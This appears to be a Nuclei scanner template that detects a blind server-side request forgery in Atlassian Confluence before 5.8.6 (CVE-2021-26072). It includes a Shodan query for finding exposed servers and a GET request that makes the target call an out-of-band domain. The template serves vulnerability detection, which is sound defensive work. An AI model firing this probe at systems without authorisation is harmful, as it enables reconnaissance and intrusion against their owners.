id: confluence-ssrf-sharelinks

info:
  name: Atlassian Confluence < 5.8.6 Server-Side Request Forgery
  author: TechbrunchFR
  severity: medium
  description: Atlassian Confluence < 5.8.6 is affected by a blind server-side request forgery vulnerability in the widgetconnector plugin.
  remediation: Upgrade to Atlassian Confluence version 5.8.6 or later.
  reference:
    - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks
    - https://github.com/assetnote/blind-ssrf-chains#confluence
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26072
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 6.8
    cwe-id: CWE-918
  metadata:
    max-request: 1
    shodan-query: http.component:"Atlassian Confluence"
  tags: confluence,atlassian,ssrf,oast

http:
  - method: GET
    path:
      - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://confluenceshare.{{MY-DOMAIN}}/'

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: body
        words:
          - "faviconURL"
          - "domain"
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100d27e230f4b75e22ffc16003d3ee34ea086b004ef21f63501b869dfd0997cddbb0220313a82a46d490b5b03c2da2aa0ef69a6fd96861f349eb6d920ea4bcb326bddfb:922c64590222798bb761d5b6d8e72950
